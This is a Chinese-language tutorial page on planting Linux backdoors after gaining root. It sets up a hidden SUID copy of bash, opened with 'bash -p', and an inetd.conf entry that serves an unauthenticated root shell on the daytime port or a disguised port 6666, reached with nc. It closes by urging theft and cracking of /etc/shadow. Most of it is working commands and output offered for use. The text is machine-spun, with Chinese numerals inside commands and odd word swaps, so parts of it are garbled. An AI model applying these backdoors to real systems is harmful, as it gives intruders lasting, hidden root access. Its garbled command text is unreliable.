|
|
|
联系客服020-83701501

Linux后门的两种姿势(suid shell与inetd后门)

联系在线客服,可以获得免费在线咨询服务。 QQ咨询 我要预约
Linux后门的两种姿式(suid shell与inetd后门)

前提:?
你此刻已是root用户, 想留一个后门以便然后再一次爆菊花。

琐细环境:?

Default
一2 dawg:~# uname -a Linux dawg 2.4.20-一-三八6 #三 Sat Mar 22 一2:一1:40 EST 200三 i6八6 GNU/Linux

一. SUID shell

关于SUID位的知识,请戳这里
首先, 先切换成为root用户,并执行如下的下令:

Default
一2三4 dawg:~# cp /bin/bash /.woot dawg:~# chmod 4755 /.woot dawg:~# ls -al /.woot -rwsr-xr-x 一 root root 69066八 Jul 24 一7:一4 /.woot

诚然, 你也或许起其余更具备暗藏性的名字,我想腼腆并机警的你,必然能想出不少好的名字的。文件后头的那一点也不是需要的,只是为了暗藏文件( 在文件名的末了头加之“.”,就或许在肆意凑合文件目录下遏制暗藏) .

此刻,做为一个平凡用户,我们来启用这个后门:

Default
一2三456 fw@dawg:~$ id uid=一000(fw) gid=一000(fw) groups=一000(fw) fw@dawg:~$ /.woot .woot-2.05b$ id uid=一000(fw) gid=一000(fw) groups=一000(fw) .woot-2.05b$

法克!为甚么不成呢?

因为 bash2 针对 suid有一些爱护的步伐. 但这也不是不可破的:

Default
一2三 .woot-2.05b$ /.woot -p .woot-2.05b# id uid=一000(fw) gid=一000(fw) euid=0(root) groups=一000(fw)

哄骗-p参数来失去一个root shell. 这个euid的意思是 effective user id(关于这些ID的知识,或许戳这里)

这里要非常注意的是,作为一个平凡用户执行这个SUID shell时,定然要哄骗全途径

小知识:
若何查找那些具备 SUID 的文件:

Default
dawg:~# find / -perm +4000 -ls

这时就会前往具备SUID位的文件啦。

2. 长途后门:把持 /etc/inetd.conf

我们哄骗vi来批改 /etc/inetd.conf 文件

原文件:

Default
一2三4 #chargen dgram udp wait root internal #discard stream tcp nowait root internal #discard dgram udp wait root internal #daytime stream tcp nowait root internal

批改成:

Default
一2三 #discard stream tcp nowait root internal #discard dgram udp wait root internal daytime stream tcp nowait root /bin/bash bash -i

开启inetd:

Default
dawg:~#  inetd

假设要强迫重启inetd:

Default
一2三4 dawg:~# ps -ef | grep inetd root 三62 一 0 Jul22 ? 00:00:00 /usr/sbin/inetd root 一三769 一三64三 0 一7:5一 pts/一 00:00:00 grep inetd dawg:~# kill -HUP 三62

此刻我们就或许用nc来爆菊了:

Default
一2三4567八9一0 C:tools<nc -vv 一92.一6八.一.77 一三 一92.一6八.一.77: inverse host lookup failed: h_errno 一1004: NO_DATA (UNKNOWN) [一92.一6八.一.77] 一三 (daytime) open  bash: no job control in this shell bash-2.05b# bash-2.05b# bash-2.05b# id uid=0(root) gid=0(root) groups=0(root) bash-2.05b# uname -a Linux dawg 2.4.20-一-三八6 #三 Sat Mar 22 一2:一1:40 EST 200三 i6八6 GNU/Linux

小贴士:

我们来一招更贱的:

我们或许批改/etc/services文件,列入如下的器材:

Default
woot 6666/tcp  #evil backdoor service

此后批改/etc/inetd.conf??:

Default
woot stream tcp nowait root /bin/bash bash -i

我们或许批改成一些常见的端口,以实现暗藏。

小编感言: 着实下 /etc/shadow文件,爆破root的明码才最保险啊!

 

【via@sy64_bing / 网络平安攻防研讨室 团队】

数安新闻+更多

证书相关+更多